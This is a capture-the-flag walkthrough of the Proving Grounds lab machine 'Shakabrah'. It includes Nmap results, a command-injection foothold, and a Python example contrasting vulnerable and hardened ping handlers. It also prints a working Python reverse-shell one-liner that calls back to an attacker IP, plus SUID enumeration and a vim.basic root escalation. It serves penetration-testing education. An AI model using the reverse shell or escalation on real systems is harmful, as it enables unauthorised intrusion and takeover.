Proving Grounds Play: Shakabrah Walkthrough

Sanaullah Aman Korai
Sep 8, 2023

Let’s begin with an Nmap scan on this machine, unveiling two open ports — 80 (HTTP) and 22 (SSH). Our journey starts with the HTTP port, where we discover a command injection vulnerability that we can escalate to remote code execution (RCE).

By crafting a Python payload tailored to our IP and Port, we gain a foothold on the machine. Next, we dive into enumeration and spot a SUID binary, vim.basic, which we can exploit for root access.

Following the guidance from GTFOBins, we leverage vim.basic’s Python3 support to elevate our privileges and obtain a root shell.

First things first: run an Nmap scan against the machine to see which ports are open and which services are running on the box.

Nmap scan report for 192.168.236.86
Host is up (0.15s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 33:b9:6d:35:0b:c5:c4:5a:86:e0:26:10:95:48:77:82 (RSA)
| 256 a8:0f:a7:73:83:02:c1:97:8c:25:ba:fe:a5:11:5f:74 (ECDSA)
|_ 256 fc:e9:9f:fe:f9:e0:4d:2d:76:ee:ca:da:af:c3:39:9e (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.23 seconds

As we can see, two ports are open on this machine: 80 (HTTP) and 22 (SSH). Let’s enumerate port 80 first.

It looks like a connection tester that pings localhost. Exploring the host further, we identified that it is vulnerable to command injection.
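To show why a "ping this host" feature turns into command injection, here is an added Python example (not the machine's own web app, whose source we never see): the vulnerable pattern of gluing the host into a shell string, next to a hardened handler that validates the value and never invokes a shell. The host values and the check function names are constructed for this illustration.

```python
import ipaddress
import re
import subprocess

# Constructed inputs: what the page's "connection tester" form would receive.
# The second value carries a shell metacharacter, the classic injection probe.
BENIGN_HOST = "127.0.0.1"
TAINTED_HOST = "127.0.0.1; id"

# RFC 1123 hostname: dot-separated labels of letters, digits and inner hyphens.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def build_ping_unsafe(host: str) -> str:
    """Vulnerable pattern: user input concatenated into one shell string.
    Run through shell=True, anything after ';', '|', '&&' or inside '$()'
    becomes a second command."""
    return f"ping -c 1 {host}"


def validate_host(host: str) -> str:
    """Accept only a literal IPv4/IPv6 address or an RFC 1123 hostname."""
    try:
        return str(ipaddress.ip_address(host))
    except ValueError:
        pass
    if HOSTNAME_RE.match(host):
        return host
    raise ValueError(f"rejected host value: {host!r}")


def is_rejected(host: str) -> bool:
    """True when the hardened validator refuses the value (useful for logging)."""
    try:
        validate_host(host)
    except ValueError:
        return True
    return False


def build_ping_safe(host: str) -> list[str]:
    """Hardened pattern: validated value passed as a single argv element."""
    return ["ping", "-c", "1", validate_host(host)]


def run_ping_safe(host: str) -> int:
    """Execute with shell=False, so metacharacters in argv have no meaning."""
    return subprocess.run(build_ping_safe(host), capture_output=True, timeout=5).returncode
```

Logging every `is_rejected` hit gives a cheap detection signal for injection attempts against the tester.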

Now we can escalate that command injection to RCE. The pentestmonkey reverse shell cheat sheet provides a suitable payload.

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.x.x",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'

Customize this with your own IP and port, and we get a shell on the machine.

Now let’s enumerate to get higher privileges.

Enumeration of SUID binaries shows us that vim.basic is SUID as root.

find / -perm -u=s -type f 2>/dev/null
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/traceroute6.iputils
/usr/bin/at
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/newgidmap
/usr/bin/vim.basic
/usr/bin/newuidmap
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/bin/umount
/bin/fusermount
/bin/ping
/bin/mount
/bin/su

From https://gtfobins.github.io/gtfobins/vim/ we get several possible ways of getting a root shell.

Importantly, we also find from vim.basic -version that it has python3 support. With these two pieces of information we get a shell with an EUID of root.

Shakabrah is a fairly easy Play machine with a PWK lab feel to it suitable for beginners.

Stay tuned for the next writeup.